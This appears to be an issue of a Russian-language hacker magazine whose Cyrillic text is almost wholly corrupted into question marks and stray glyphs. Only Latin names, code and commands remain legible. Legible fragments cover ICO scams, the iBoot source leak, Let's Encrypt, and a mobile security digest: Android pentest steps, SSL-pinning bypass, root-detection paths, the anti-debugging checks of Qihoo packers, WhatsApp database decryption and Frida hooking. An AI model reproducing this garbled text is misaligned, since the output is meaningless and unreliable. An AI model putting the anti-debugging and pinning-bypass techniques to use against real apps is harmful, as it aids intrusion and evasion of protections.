???????��????�??�??�??� bash???????,�??????�??�???�?�????�???�????�
????��??�????�??�???�???�??�??燙MS.
????�,1%�???�?????�??�??�?????�????
???�?????�????��???�?�???�??�??
???�????�??�??�???�??�??�????�???�?????�?�??�?????�?燙yberEdge燝roup.
?
???�????燙yberEdge燝roup�???�???�???�??�???�??�????� 1200�? ????��?????�???�??
?��???�??�???,�??�?�?????,�??�???????�??�??�?????��??�??,�???�?�??�?�??�???
???�?????�???.
???�?????,�??�?�???�?????�????�??�??�???�????� 55%�???�??�??��,3%�?�??�????�
??????�??�???�??�???�????�??�????.�??�??�?????�??�?�??�??�?????��??�?�??�???
53,3%�???�??�????.
???�?????� ????�????�??� ??????� 38,7%� ???�????,� ??� ????�?� ????� ????�?� ??????�?� ??� ???
(19,1%)� ?� ???�?� ??????�?� ??� ???�???�??� ???�???� ???�??�??�?� ???� ???�?????�?� ???�??.
???????�??�,6%�???????�??????�??�?��????,��??????�??.
?????�?????營CO
????�??????�??� ????�??� LoopX,� ???�??�??� ????�?????�??� ???�???????
??????�??� ???�???�??� ???� ???�????� ????�?????�??� ??� ????� ????�???�???
???�???�???� ????�?????�???� ????�??�?,� ???�??�?� ????�??�??.� ???�?????�
????� LoopX� ???????� ?� ????�??�???� ???�????�??,� ?� ???� ????�???� ???�???
?� ????�??�??� ?????,� ????�??� Facebook,� Telegram� ?� YouTube,� ????� ???�???.
???�????� ????????� ???�??� ???�????�???� ???�?,� ???�??� ?????� ???????�??
????�??�??�???,�??????�??�??�???�???�?�??�??????�??�??�????.
????�?????�?� Reddit� ???�??�????�?,� ???� ???�??� ???�????� ????�?� ??????�
??????�?.� ???� ????�?????,� ?� ?????�?� ???�????�????� ?� ?????� �???�??????�
???�???�??�?粻??�???�????�??�???�????�?�?????,�營CO�??�?�??�???�?
????�??�????�????�???.�?,��?????�??,�??�????�???�???????��??�?
???�??�????�??.
ICO� ???�???� ????�?????� ???� ?� ????�?� 2018� ????,� ??� ?????�?� LoopX
???????,�??�??�?�??�?�??????�??�6,21燘itcoin�(BTC)��46,70燛thereum
(ETH).� ??� ????� ??� ???�???� ???????� LoopX� Coin� (LPX)� ?????�???� ??????�???
???�?�5�??�????�??�????.
???�??�?� ???�??�?,� ???� ??� ??????� ??� ????�??�?� ????� ????�?????�??
????�????�???�???�???�??�???�?,��??????�??�????�???��??�??�???�
????�??�???�??????�??�????牜???�???�.
??�?�?�???�???�?�???�?????�??,�???�??????�??�?燫eddit,��???????�
???�??�??�?????�?�?????燘itcoinTalk,�?????�??�??�??�??�??�??�????�
??????� ?� ???�???�???????�??� ????�?,� ?� ???�?� ????�?????�?� ??????�???
??????��??�??�?????�??�??.
???,� ???� ??????� ??� ???�??� ICO,� ?????�????�??� ?????� ???�??�??� ?????�
???.� ?� ???�???,� ?????�?� ?????� ??� ????�??�??� ???�??�?� ?????�???� ????�??
Prodeum,營CO�?????�?�???�?????��???�?�18�???��??�??�???�?????�
??� ??� ??????�?� ???�?.� ???�??� ???�??� ???�??� ???�???�?� ?????� ???�????
????�?� ???�?????�??�??� ???�?� ???�?????� ?� ????� ?????� (????�??,� ??� ????�
???� ICOWatchlist,� ?????�???� ???� ??� ????� ?????� ???????� ?� ??????�?� ????�
??�0�????�??�????).��??�?�??,�??�??�????�?�??�????�?�???牜????�
????�????�?� ????�???????�???�,� ????�???� ????� ???�??� ?????� ????�???
?�??????????�???�??�??�??:爌enis.
?��???�???�???�??�??�??,�?�?�?????�?�????�???.�??�?�????�?��???��????�?,
???�??�??�???�??�??�??�??�??,��????�???�?�???�??�??�??.�??�??�???�?!�??�??????�
??????�????�??????�??�??�??�??�??�?,�??�??�??�???�????�??�????�????�
?�???�??�??�??�??�??��???????燭he燛conomic燭imes,�??�?�?�???�???�????�???�????
?????????營PHONE
?????�?燝ITHUB
??�??�??�??�???�??????�?燝itHub�???????�???�??�????�?爄Boot,�????
??� ???�????� ???�????�???� ??????�??� Apple,� ???????� ????�???� ??� ???�???
???????�??�??�????�?.�??�????�?�???�?爄Boot�???�???�????�?�??�??
???�?�???�????�?????�???�(????�?�???�???�???�?燘oot燫OM),�?�??????
?� ??????�???�?� ????,� ???�????,� ???�?� ??� ???� ????�??????� ???�???� Apple,
?� ?????� ??????�?� ???� ???????�??� ???� ?????�???�?� ??????� ?� ?????� ???�???�
???�????.
???� ???� ???�??????�??� ???�??� ????????� ?????� ?� ?????�?,� ???�???
?� ???????�????� iBoot� ??????�?� ?� ????�??�?????.� ???� ???�??�??� ????????
?????�???,�??�??????�?�???�??�?��?????爄OS�3.x,�?�???�??,�??�????�
???� ?????� ????,� ???�??� ???�?,� ??????�???�?� ?� ?� iOS� 11.� ????�??�???� ?????,
???�???�?????�???�??�?�??�??�????�????�?????�??�??,�?�???�????
??????�?????�??� ?� ????�???�??� ???�???� iBoot� ??� ????�??� ???�????�??.
????�??,�????�??�??�??爄OS???????�???�??�??�????�?????�?�???????
Secure燛nclave.
???�?�??�???,�??�??�????燗pple��????�??�???�?�???????�???�??�?
???�??�??��???�??�????�??,��???????�??爄Boot�??�????�???�???�???�
?????� ?� ???�???�?� ???�???�???.� ???,� ????� ?????� ????�??� ???�???� ??� ????�
?????�??,� ???�????� bug� bounty� ????�????� Apple� (200� ?????� ???�????)� ????�
???�????�?�???�?�?�???�???�??�??�????�??��??�??�?�?????�??�???�
?????.
?� ???�?� ????�?� ???�?� ????� ??????�????� ?� ???????�?� ??????� iBoot� ???
???�??� ?� GitHub� ??� ???�???�??� Apple.� ????�??�???�?� ???�????� ???�????�?
??????� ??????� ?� ??????�??� DMCA� (Digital� Millennium� Copyright� Act,� �????
??� ?????�???� ???�?� ?� ???�????� ???�?�),� ???�?� ????� ????�??�??�??� GitHub
???�?????�??�???�???�??�??�???.�???�??�?,�??�????�???�??�???�???�
????�?燗pple�??�????�??�???�???�??????�????�??�??�???�?.�
??�??� ????�??�???�?� Apple� ???�????�?� ???�??�????�???�?� ????�???
?�??�?????�???�????�???�?????�??:
�???� ??� ???�?,� ????�?� ???�?????� ???�??� ????????� ????� ????�?????
???�????,�?�????�???�??????�????�????�??�??�??�?????,�??�??
??� ??????�???� ??� ???�???????� ???????�?� ????.� ?� ?????� ??????�?
?????�???�?� ???�??�??� ????�??�??� ?� ????�??�???� ???�?� ???????-�
?????,��?�???�?�??�???�?�????�???�?????�??�????????�?�?
?????�??� ???�??� ?� ??????�?????� ???�??�??�??� ?????� ????�??�??
???????�?????�.
50�0�0�???????�??�?????�??�??�????
LET?S燛NCRYPT
????�???�?� ?????�?????�???� ????�?????�??�?� ???�??� Let?s� Encrypt� ???�????�???� ?????
???�?????�?.
???�???�??�??�?????�?,�???????�??????�????�????�???�???,�???�?????�??�????
50�????????�??��?????�???�???�?�????�?��????????�??????.
???�????� ???�??�???� NetTrack,� ?� ???�?????� ???�?� ???�?????�?� Let?s� Encrypt� ??????�???�?
??� 42,6%� ????� HTTPS????�??� ?� ???????�?.� ???�?� ????�???,� ???� ???� ???� ??????� ?????� ????
??????�???�??�?????�%.
??�??�??�??�???燜irefox燭elemetry,�????�???�??�????�???�??�?燞TTPS��??�?????�???�
??�??�???�?�,6%.
HEADER
?????????
????????
???????�?????
????????燯nixoid�燤obile
zobnin@glc.ru
????????????�????????
???燝PS,�????�?????????
QIHOO��??????????
??????????��???????
??�??�?� ?� ?????�?:� ?????�???�??� ????�??�?� ?� ???�?????�
???燝PS,�????�???�?????�?�??�??�???燪ihoo,�??�??�???�
?????� ????�??� ???????�?� ?� ???�??�??� ????�????� What?
sApp,�?????�????�??�???�??��??�??�?.��??�?:�?????
??�?????�??????�??�??????��??�?�??�???�???,�????
???�????�?� Android� KTX,� ???�???� ???�????�????� ????�???�
???,� ????� ?� ??????� ?,� ?????�?� ??,� ???�????� ???�??� ????�
??????.
???????????
? StaCoAn� ?� ???�??�???� ???� ????�???�???�??�???� ???�????�???� ???�???
???�???�??�??燗ndroid?�???�????�??�??�??燗PI????�?,燗PI???????�??,
???�?�??�??????��???�??
? Quiet��?�????,�?�???�?�???�??�??�??�????�?�??�?????�?�??�??
(???�????燭CP)��??????�??�??
? Electra�爅ailbreak�??爄OS�.0?11.1.2?
? LibScout��??�??�???�??�???�?�??�????�??�??�??�?????��??�????�
???�(?????�???????��??????�????�??�????).
????????
??�??�???�??�???�??�?��??�????�??燝PS
PinMe:� Tracking� a� Smartphone� User� around� the� World� ?� ?????�???�??,� ????�
?????�??� ?????�???�??� ??????�????� ????�??�?� (?� ???� ???�???�?)
???�?????�??????燝PS,�????�????�?�??????�???�???��??�??�??�???
Wi?Fi.� ????�?� ???�?� ?????�???�???� ??� ?????�???� ????�????� ????�??�??�???
?� ????�??�???� ??????�?????� ????�???�???,� ?????�??,� ????????� ?� ???�??,
???????�??�?????�????�???�??�???�?????�????��??�?????燝PS.
????�?????��??�?????.�?�???�???�???�??�???�???�??�???�??燩in?
Me.� ?� ??????� ?????�?� ???� ??????�?� ???????�??� ?� ???�?????� IP?????�?
????�??�?� ?� ?????� ????�??� ????�???�?� ???� ????�???????�??� ???�??????�
?????.� ?????� ??????�???� ????� ???????�??� ?� ???�????,� ???????� ???�???�?
????�?????�??�????�??�????,�???�???�????�???�????��?????�??�????�
???� ????.� ???� ???????�??� ??????�???�?� ???� ????�???�??� ???�???� ??????�
???????� (????�?,� ????�?????,� ?????�???�??� ????�????,� ???????)
?�??????�??�?????.�??�??�??�?????�?????�???�?�??�???�???�??�???�
????� ???�?????�????� ??� ???�?????� ????�????,� ?????� ???� ??????,� ????�
???????�??�??��??�??�??�??.
??�???�??� ???�??�?� ????�?� ???�??�?????.� ?????�???�????� ???�???
??????�?�??�????,�????�??????�燝PS.�???�?�???��???�???�??:燩inMe
??� ?????� ????????� ?� ????� ?� ???�??� ???�??,� ???� ???� ?????,� ??� ???�?� ??????�?
?�???�??�??????�??�??�???�?��??????�?????�???�???�(???�????,�???�
??????��??�???�????�?�??�???).�??�?燩inMe�?�??�???�?,�???�?�????�
???�?� ????�???�??� Tor????�???� (IP??????� ??????�??� ???�?� ?????� ???�??????�
???).
???�??�???�??�??�???,�??�??�????��?????�?????�?燝PS,�??�??
?�??????��??�?????燩inMe
???�???�??�????�??
A� Virgil?s� Guide� to� Pentest:� Operation� Android� ?� ????�?� ???�????� ???� ???????�
????.�?????�?????�?�??�????�?????�?,�?�?�??�??�?�????�?�??�??
????�??�??�???.�??�????:
? ???� ????�??� ???�??�??�?� ?� jadx?gui� (?????�??????)� ?� apktool� (???�???�?
?????�???燗PK��??�???�??�??????)?
? ??�??�???�??�??�??�???�?燬SL爌inning�燗ndroid?SSL?TrustKiller?
? ??�??�???�??�??�??�???�???�???�??�???�???�?�??�????�??�� Droz?
er?
? ???�????� ro.build.version.release,� ro.product.model� ?� ro.
product.brand� ?� ???�???�?� ???�?� ????�???.� ??????�??� ???�???�??
??????�???�?�??�???�?????�??�??�???�???�??�??
? ??�?� ?� ???�???�?� ????� root????�??� ?� ???�???�??� ????�???�???� ????????,
????�?� ????�??�??� ???�?� /system/app/SuperUser.apk� (SuperSU.
apk)��/system/bin/su.
???�??�??�???�??,�??????�???�??�??�????燪ihoo
Dissecting� mobile� native� code� packers.� A� case� study� ?� ???�??� ???�???�??,
???????�???� ?� ???????� ???�??�???� Qihoo.� ?� ??????� ???�???�?� ????????
???????�??�??????,�???�????�?�?�?????�??�?�??.
1.燚EX?????� ???�???�??� ?????� ????�?� ???????� ????????,� ????�?� ???� ???
???�???� ???�????�?� ????,� ???� ???� ????�?� ???� ?????�?� ????:� ???,� ???� ??
????�?,��??�?????�?�??????�??�????�??�??�????�?.�??�??�???�??
??????,� ???� ????�??� ?????� ???�?� ??????�?� ???????�??� ?� ???� ?????
?????�????�??�???�???.
2.�??�????�??� ?????�??� ???�????�?� ?????�???� ???�???�?� ???�????� ??� ??,
??�?????�?�?�??�??�??????�??,��????�??�????�???�?��??�???�?
?� ??????� ???�??� ???�????�?.� ???�?� ???�????� ??� ???�???�???� ???????�?,
???�????�?� ???�?� ??????�???� ???�??� ?????� ??????� ?� ???�????�??
??????,�??????�??????�?�???????�???�?�????�???�???燗RM.
3.�??�??� ?????�??� ???�????�?� ?� ???� ???�?????� DEX????�??.� ??� ?????�???
??� ???�?� ???�?????�???� DEX????�?� ?????�????�??� ????�???,� ????�
?????�???�?� ???,� ???�????�???�?� ???�???� ???� ???????�??,� ?� ?????
??????�?�??�??????�??.
??�???�?????�??�???�?????�?�????�????:
? ???�??� ???�?� /proc/self/status� ?� ???�??�?,� ???� ???�????� TracerPid
???�?�????
? ???�??� ?????�???� ???�?� ???�???� (/system/bin/linker)� ?� ???�??�?
???�???� ???�?� ???�???� rtld_db_activity� (????� ????????� ??� ???�???�
???��??�??�???�????�??�??�??�?????)?
? ??�???�???�??�?� /proc/PID/cmdline�???�??�??�??�(?�??????�???
???�??)� ?� ????�??� ????�????�??� ?????� (android_server,� gdb,� gdbserver
?�??�??)?
? ???�??�?� ???�?� /proc/net/tcp� ??� ?????�????� ????�?� 00000000:
23946�(???�???�???,�??��?????�???�??�??�??營DA)?
? ??�???�???� ???�??� /proc/self/mem� ?� /proc/self/pagemap,� ???�?
??????,�??�??????�??�??�??�???�??�?�??�???�?�?.
???�??�??�????�???�??�??????�?燱hatsApp
WhatsApp燜orensics:燚ecryption爋f燛ncrypted燚atabases燼nd燛xtraction爋f燚elet?
ed燤essages爋n燦on?Rooted燗ndroid燚evices��???�??,�?��???�????�??
????�??�??� ??????� ?� ???,� ???� ???????� ????�??� ???????�?� WhatsApp� ??� An?
droid?????�??�?.�??�???????�?????:
1.�??�???� ?????� ???????�?� ?� ???????� ??????� WhatsApp.� ?????� ?????
?????�????,��???�?�?�??�??�???�?,�??�??????�???,�???�??�???
?????�???�??�?????�??�???�??�???�???�??�???�??�?�?????.
2.�?�?????� ???�?� root� ?� ???�???�???� ????� ???�??� WhatsApp� ??� ???�??�???
??????�?� (????� msgstore.db).� ???� ??� ?????�?????,� ?????�?� ??� ???�?
????�??????��??????�?????燬QLite???????.
3.�??�???�????�????�??�?燗ndroid.�?????�??�??�???�???�?�????�???
?� ????� ????�??�?� ???�???� ??????,� ?� ???�??� ??� ???� ????� ??� ???????�?
?� ???,� ???�?� ???� ?????�?????.� ??� ???�???� ????�??�?� ???�????� Oppo
????�?�???�?�????�??�??�???�??�?????�??�???�??,��????�??�???�
???�???�??�????�???�?�???�??�??燱hatsApp�(????�??爉sgstore.db).
?� ?????�??� ??????� ????�?� ???�??�???�?,� ???� ?� ????� ???�???� ???�?� ???�???�
??????� ???�??�??� ????�????.� ????� ?� ???,� ???� ?????� ???????� ????�????
?� ????� ???�??� WhatsApp� ???�???� ?????� ???� ?� ???� (????� msgstore.db?wal),
?�????�?????�??�� msgstore.db.� ???� ???�????� ????�????� ???� ?????� ????�
????� ??� ????????� ????,� ??� ????�?� ?????� ??????�?� ?� ????,� ????�?� ???� ???�?
???????.
???�??�??�???�????,�??????�??��???
???�??????????�????�??�???�??
Mobile� Application� Hacking� Diary� Ep.2� ?� ??????� ?� ???�???�?� ???�??,� ?????�
??????� ??????�??� ???�???�??� Android� ?� iOS,� ??� ???�???� ????�?� ???�????
???????�???爎oot�?�?????�???.�???,�??�??�??�??�???:
1.� ??�??????�???.�????�?????�?�??�???�??��??????燘ytecode燰iewer
(?????� ???????�???� ??????�?????� ????�?� ???� ?????� ???????� ???�?� ????�
????�??� ????�??� ?????�??????� ?� ???�???�?).� ???????� ???�??� ????�??
????,� ?????�??�??�???� ???�???�??� ?� ???????� apktool,� ???????� ???� ??
????�??� ????� ?� ????�???� ???�??�?????� ??� ???�????� (???�????,� true
??爁alse).�?????�?�??????��???�??�???�?.
2.� ??�??????�???�?�???��??????�??????�?.� ???�?????�???� ???�????�
???� ?� ???????� apktool,� ????�???� ???�????� ????� android:debuggable
?燗ndroidManifest.xml�?爐rue,�?????�???�?�??????.�??�??�???�?��???�
????�??��??????�??????�?� AndBug��????�???�???�????�?��????�
???� ???�???� ???� ??????.� ?????� ???�??�???�?� ?� ???�???�??� ?� ???????
jdb,� ???�??� ?????????�?� ??� ???�??� ?????� ?� ????�???� ???�??�?????� ??
???�????.
3.� ??�?????�??�??�???�????�???�?�???��??????燜rida.�??�??�???� Fri?
da� ???�???�?� ?????�???� ????�????�?� ?� ????�???� ????� ???� ?� ?????� ????�
????�??� ??� ????�??�?.� ?� ???�???� ?????� ??????�???� ??????� ???� ????�?
???�???�?????,��????�??�????�??�??�????�?,�??????�??????�???
?????��???�???�??�??�?????�?�??�????.�???�?��???�???�??�???�
????�???�???�?�??�??�?�?????�?????�????�?.��?????�????� Frida
CodeShare�??�?�??�?�??�??�??�??�??????.
???�?????燩roject燭reble
Developer� Brings� Full� Project� Treble� Compatibility� to� the� Xiaomi� Redmi� Note� 4� ?
?????�??� ??????� ?� ???,� ???� ???�????�???� ?� ???????� XDA� Developers� ???�???
???�???????�???�????燭reble�?燲iaomi燫edmi燦ote�
??�??�?,�??�??�????�?燭reble�???�?????�?�??�?????�???�?????�???
???�?????�????� ???�????�?� Android,� ??????�???�??� ??� ???�??�??� ??????.
???????� ?� ????�??� ???�??� Android� ???�????� ??� ???� ???�?,� ???????� ????�
??????�???� ?� ???�??� ???�????:� vendor� ?� system.� ???�??� ?????�??� ??????�
??????�?�??,�?????�??�?�?????:�???�???��??�????�?燞AL.�??�??�
???�??燗ndroid.�??�?�????�??�??�?�??�???�???��??????�???�????
?�????�?�?�?????�?�???�??�?�??�????.
????� ?????� ?� ???,� ???� ?????� ???�??� ??,� ???????�??� ???�?� Android� 8,
?????�??�?????�??�????�?�爒endor????�????�???�?�??�???�??�??�??,
?????�???�??�??�??�???�??�?????�??�??�??�?�????�???�?�????????�
??� (??� ?????� ????� Google� ????� ?????�???� ????�?� Android� ???� ???�???�?
Generic燬ystem營mage,�?�??�?�??�???�?�????�???�???��??�??�???
Treble,��??�?????�???).�???�???��??,�??�??�???�??�??�????�???燭re?
ble�??�??????�???�?�???�?�?�???�??�?,�???�???�?�?????�???�?燗n?
droid���?�???�?�??????�?????�???,�??????�??�燗ndroid�??��???
?????�???????�??�?�???�??�??�??.
???�????�??燼bhishek987�??�??�??�???�???.�?�??�??????�??�?????�
??� Treble� ??� Xiaomi� Redmi� Note� 4,� ??????�????� ???�??� cust,� ???�??� MIUI
???�??�????�??????�??�?�?????�???,��????�??�??�???爒endor.
???�??�??燭reble�?燲iaomi燫edmi燦ote�????????????
??�???�?�?????�??????�??�??????
Basic燗ndroid燛ncryption燚o?s燼nd燚on?ts��?????��??????�??�???�??????
?� ???,� ???� ????� ?� ???� ??� ????� ??????� ???� ??????�??????� ???�??????� ?� An?
droid.�???�??�????�?:
??� ??????�??� AES� ?� ??????� ECB.� ??� ????�????� Android� (?� Java)
???� ???�??????� ??� ????�??�?� AES� ???�???�?� ?????� ECB.� ????�???
??????� ECB� ?� ???,� ???� ??� ?????� ???�????� ???�?????�?� ?????�????�??
???????�??.�???�?�???�??�???�?????�?????�?????燙BC�燝CM:
//�??�???�?????
Cipher.getInstance("AES/GCM/NOPADDING");
//�??�?�???�?????
Cipher.getInstance("AES");
????�?�?????�??�??�??�??營V:
//�??�???�?????
SecureRandom爏ecureRandom�爊ew燬ecureRandom();
byte[]爄v�爊ew燽yte[IV_LENGTH];牋牋
secureRandom.nextBytes(iv);牋牋
myCipher.init(Cipher.ENCRYPT_MODE,爇ey,爊ew營vParameterSpec(iv));
//�??�?�???�?????
myCipher.init(Cipher.ENCRYPT_MODE,爇ey);
byte[]爄v�爉yCipher.getIV();
??�??�??� ???�??� ???�???� ??????� ???�?� ??????�??????.� ??
??????� ??????� ????�???� ???�??,� ?????�????� ????,� ?� ?????�??� ???�????�
????�?�???,�??�?�??????�???�??�????�?�??�????�??�?????:
byte[]燿ecrypt(byte[]燿ataToDecrypt,燽yte[]爏ecretKey)爗
牋�//�?????????????�?????
牋�...
牋�//�??????�???
牋燗rrays.fill(secretKey,�(byte)�;
牋爎eturn燿ecryptedData;
}
???�????�????�???�??,�???��?????
How爐o爏ecure爕our燗ndroid燼pplication?� ?� ??????� ?� ???�???� ??????�???� ????�
????�?��??,�??�?????�?????�??�????�????�???�??,�???��?????��???�
??�??�???�???.�??????�????�????,�??�???�?:
? ??�????�?� ????�??.� ???�???� ???�?????� ???�??,� ???�???�??,� ????�
??????�???�???�???�????�???�?,�?�????�???�????�?�??�?�??�??
?� ??� ???�??� ?????�???� ??� ???�??�??� ???�??.� ????�??�?� ????�??� (?� ????
??????�????�??�?????)�??�??�?�爏ecurity????�????�???�(TTE),�???????
???�??� ?� ??????�?� ?????� ????�?� ??.� ???�????�???� ???�???�??� ????�???
????�?� ???�???� ???�??� ????�??�??� ?� ????????� ?????� (?� ???�???)� ?� ????�
???????�??�????�??????:
val爁manager�燜ingerprintManagerCompat.from(getApplicationContext())
fmanager.authenticate(cryptoObject,�燾ancellationSignal,燼uthen
ticationCallback,爊ull)
? ???�????�????�??.�????��??�????�???�??�???:�???�?????�?????
???�????�?� OpenCV,�???�????�??�??�??�???�???????�????�????�???�
?????�?�???�??????�(???�????:�??�?�??�?????),�???�??�???�??????�
??�???�???� Microsoft�� Google.�???�???�??�????�?�???�???��??,�??
???�???燤S�燝oogle�???�??��??�???�??�???�???�??�??�????��???.
? ???�????�????� ??????.� ???� ???�??????:� 1)� Google� Assistant� ???�?
????�?????�?????�?�?�??????���??�??�??�???燗ndroid�0�???�???�
????燭rusted燰oice,�??????�??�?????�??�??�???�???�???�???�???????
3)� Google� ??� ???�??�????�?� ???�??�??� ???�????�????� ???????� API
???�??�????�????�?????.�??�????�?�???�??�???�?�???:�???�??�???�
????燤S.
???�???燗ndroid燢TX
Exploring燢TX爁or燗ndroid�(??�????)��??????�??�????��??�????�?燗ndroid
KTX,� ???????� 5� ???�???� ????�?????�?� ???�????� Google.� Android� KTX� ?????�
????�???�????�????�??�???��???�??,�??�??�??�????�???�?�????????
???�????�?� ???� Android� ??� Kotlin.� ???� ????� ??????�??� (??� ????� ????�???,
?????�??�??�??)�??�???:
//�??????????�???????
sharedPreferences.edit爗�
牋爌utBoolean(key,爒alue)�
}
//�?????��???????��?????
val燿ay�燚ayOfWeek.FRIDAY.asInt()
val�(seconds,爊anoseconds)�營nstant.now()
val�(hour,爉inute,爏econd,爊anosecond)�燣ocalTime.now()
val�(years,爉onth,燿ays)�燩eriod.ofDays(2)
//�???????�??????
val燽undle�燽undleOf("some_key"爐o�,�"another_key"爐o�)
//�?????�燗tomicFile
val爁ileBytes�燼tomicFile.readBytes()
val爐ext�燼tomicFile.readText(charset�燙harset.defaultCharset())
atomicFile.writeBytes(byteArrayOf())
atomicFile.writeText("some爏tring",燾harset�燙harset.defaultCharset
())
//燬pannableString
val燽uilder�燬pannableStringBuilder(urlString)牋牋牋牋
牋�.bold爗爄talic爗爑nderline爗燼ppend("hi爐here")爙爙爙
//�????????????�?????�燯RI
val爑ri�爑rlString.toUri()
//�?????�燚rawable�燘itmap
val燽itmap�燿rawable.toBitmap(width�爏omeWidth,爃eight�爏omeHeight
,燾onfig�燽itMapConfig)
val燽itmap�爏omeBitmap.scale(width,爃eight,爁ilter�爐rue)
//�???????�??�???????燰iew
view.postDelayed(delayInMillis��0)爗
牋�//爏ome燼ction
}
view.postOnAnimationDelayed(delayInMillis��0)爗
牋�//爏ome燼ction
}
view.setPadding(16)
val燽itmap�爒iew.toBitmap(config�燽itmapConfig)
//燰iewGroup
viewGroup.forEach爗燿oSomethingWithChild(it)爙
val爒iew�爒iewGroup[0]
??�?????�????�?????�??�????�????
Automate爕our燼pp爏creenshots��?????��??,�??�???�???�???�???�??????�
???� �??�??粻 ?????�????� ???� Google� Play� ?� ???????� ???�???� screengrab
?� ?????�?,� ???????� ??????�??� ????�???� ?� ??????�??,� ???�???�???� ?� ???
???�?� ???�??�??� ????�?� ???�?????.� ???� ??????� ???�?� ???�???� ?????,� ?� ???
?????�???�??�????��???�????/?????�????�?????�???:
function爏tart_clean_status_bar爗
牋�#�???????�????????
牋燼db爏hell爏ettings爌ut爂lobal爏ysui_demo_allowed�牋�#�?????????�????�:00
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
clock�e爃hmm�00
牋�#�?????????�?????�????????�燱i?Fi??????�??�?????????????�
???????
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
network�e爉obile爏how�e爈evel�e燿atatype爁alse
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
network�e爓ifi爏how�e爈evel�e爁ully爐rue
牋�#�???????�??�??????????
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
notifications�e爒isible爁alse
牋�#�?????????�?????�????�??????
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
battery�e爌lugged爁alse�e爈evel�0
}
function爏top_clean_status_bar爗
牋燼db爏hell燼m燽roadcast�a燾om.android.systemui.demo�e燾ommand�
exit
}
???�????�?
? backgroundable?android� ?� ???�??� ???????�??� ????�????�???�??� ???�??
????�??�??� ?� ???????,� ???�???�???� ???????� ??� ???�???�?� (???�?� ?????�
????????�??�???????�??�???�??��??�??�????�????)?
? kotlin?android?examples��??�??�??�??�?????�??�????�???�?燢otlin?
? RichUtilsKt��????�??�??�?�??�??�??�??�?�(?????�????�???,�?????
?�???�?????�??,�??�???,�??????�???�?��??�??�??�??)?
? AwesomeBar��??�????�??�???�??�??燗ctionBar?
? Fluid燬lider��????�???�??�???�??�??�???�???
? Sneaker��??�????�?�??�?????�???�????��??�???�??�?�???�??
? ColorPickerPreference��?????�?????�??�??
? Videoapparat��???�??��?????�??????�??�????�?�??�?????��????�
???�?????
? ScrollingPagerIndicator� ?� ????�????� ???????�???�??� ????�????� ?� ????
??????
? Android?Gold?nger� ?� ????�??� ?� ??????�??????� ???�????�?� ???� ??????�
??????�??�?�???�??�?�???�??
? KFormMaster��???�??�????�?�??�??�????�???�?燢otlin?
? Prefekt��???�??��?????�??????�??�????�?�??�?????燬haredPrefer?
ences�?燢otlin?
? Scripto� ?� ???�????�?� ???� ????�?� ????�???�??� ???�?� Java� ?� JavaScript,
???????�??????�???�???�?燱ebView?
? Light� ?� ???�??�????�??� ?????�????� ????�???� (snackbar)� ?� ???�????????
???�?????�??.
COVERSTORY
?????
???? ???????????
???????????�營CO
?�????????????
?�????�?????????????
??� ???�?????� ???� ??� ????�??????� ???�?
???�???�?�?????�?????�?:�??????�?�???�
???�?� ???�?????� ???,� Bitcoin� ???� ???� ??
????�??� ?� ???� ????�?� ???�???,� ?� ?????
???�???�?� ????�?????� ????� ??� ??� ???�??
????.� ???� ???� ???�????�?????� ??????�??
???�?????�??,�??????�?�??�?,�??�?????
???�?????�?????,��????�???��??�???�?
?????�????,� ???????� ???�?????� ???�???
???�????� ??????� ????� ???????�??.� ???�?
???�?�??�?�??????�???�??�?????�?????�
??� ?????�??� ????�??�??� ?� ???� Initial� Coin
O?ering,�??營CO.
?????�?????
????.�??????????????�
https://foster.ga
colin.patrick.�
foster@gmail.com
ICO??????
??�?� ??� ????�??� �??�?� ?� ??????????�,� ??� ???�???,� ???� ?� ????????� ??????,
???�?� ???�???� ???�???�?� ???�?,� ?????� ??� ???�??� ?� ??????�??� ???????�
??????�????�?�??�??�??�????�?營PO.�???�?????�??�???�???�???�??
???�????� ?� ???�?????� ????� (??� ????� ??� ???�?)� ?� ?� ????�??????� ???????.
???�?�??�???�??營PO�??????�?�?????�?�????,�??�?????�??�?????�???
???�???,��??�????�??�???�???�??�???�?�??�?��??�???�?�??????????�
????.��???�??????�??�???�??�?營PO�????營CO.
???�????�??� ????�???� ?????� ???�???�?� ?� ???�?� ???�?????� ???�??,
??????�?� ??� ???�???????�??,� ????????� ?� ????� ??� ???�?� ??� ???�???????�?
???�?�??�???�?�??�??�????��????�???�???�?????.�?�???,�?????�???
???�????????�?�???�??�?.
??�?????�???� ?????� ?????????�????� (???�????,� ??� Solidity� ?� ???�?� ????�
????�??� Ethereum),� ?� ????�???�???� ?� ???????� ???????�?� ??????�?� ??????
?� ?????� ??� ????� ????�?.� ????� ??????� ???� ????� ??� ???????� ??� ????�??�?,
??� ???????� ??� ???????.� ?� ????�????�??� ???�?� ???????�?� ???�??� ???�???
??????�?�??�????�??�??�??,�??�??�???�??�????.�??�???�??�??�????
???�???�??.
INFO
???�??� ???�??????�???� Ethereum???????� ?
???� ???�????� ?????�??,� ???????� ???�???�?
??????� ????�??�?� Ethereum.� ???� ???�???�?� ????�
???�???� Ethereum,� ???????� ?????� ??� ETH
(�???�)� ?� ???�?????�??� ??????� Ethereum,
???????� ????�?????� ???� ??????� ?????????�????�
???.�????�??�?�??�?�??�???�?????�???�???�
???燘itShares,燘itcoin,燫ipple,燦EM��??�??.
???�???�?� ??????,� ?????�???� ????� �???� ???粻 ?� ??????� ???�??� ??� ????�??
??� ???�????�??� ???�??.� ????�??????,� ???�???� ??� ???�??� ???�????� ??� ????�
???????,��??�??�??�??�???�?????��??�??�??�??�??�????�??�?????�
???� ???� ??� ????�?� ???�??� ????????� ??????�?� ???????�?????� ???�???.� ???�?
?????� ???� ?????� ???�??� ?????:� ???�???� ??????� ???,� ???�????,� ????�???� ??
?� ???�??�?.� ????� ????� ????�??� ??� ????�??�?� ?????� ???�?????�?� ??� ???�?
�????�??�??�?�,�?�???�?�??�?????�????�??�?????�?�???�?�?????.
???,� ???� ????�?� ??� ????�?.� ?� ?????�??� ????� ICO� ?� ???� ??????
??� ???????�?????� ????�?� ?� ???�????� ??????�??� ?� ???????.� ???�???� ???
??????�????� ?� ???�???????� ?� ????� ????�??????� ???� ???� ??� (?� ??� ?� ?????)
